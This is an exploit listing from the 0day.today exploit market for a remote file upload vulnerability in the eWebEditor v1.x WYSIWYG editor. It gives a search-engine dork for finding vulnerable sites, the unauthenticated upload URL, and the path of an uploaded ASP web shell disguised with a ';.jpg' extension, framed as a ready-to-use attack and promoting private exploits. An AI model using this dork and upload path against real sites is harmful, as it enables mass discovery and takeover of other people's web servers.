[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

eWebEditor v1.x (WYSIWYG) Remote File Upload Vulnerability

Author
Ma3sTr0-Dz
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-12352
Category
web applications
Date add
22-05-2010
Platform
php
==========================================================
eWebEditor v1.x (WYSIWYG) Remote File Upload Vulnerability
==========================================================


# Author..................: [Ma3sTr0-Dz]
# Location ...............: [Algeria]
# Software ...............: [eWebEditor v1.x (WYSIWYG) Remote File Upload .]
# Impact..................: [Remote]
# Site Software ..........:[http://www.ewebeditor.net/]
# Sptnx ..................: [CmOs_CLR & Sec4ever Memberz.]
# Home : .................: [Www.Sec4ever.Com/home/ For Latest 2010 Localz & priv8 Exploits !]
# Contact me : ...........: [o5m@hotmail.de]
# Vulnerability: Remote File Upload .
 
 
#
Part ExplOit & Bug Codes :
 
------
Dork :
------
allinurl:ewebeditor/asp/
 
Exploit :
---------
 
http://site.com/[path]/asp/upload.asp?type=file&style=coolblue&language=zh-cn
 
http://site.com/uploads/asp/sec4ever.asp;.jpg
-----------------------
Don't Forget : Www.Sec4ever.com/home /// Ur Secure Mind /



#  0day.today [2024-11-16]  #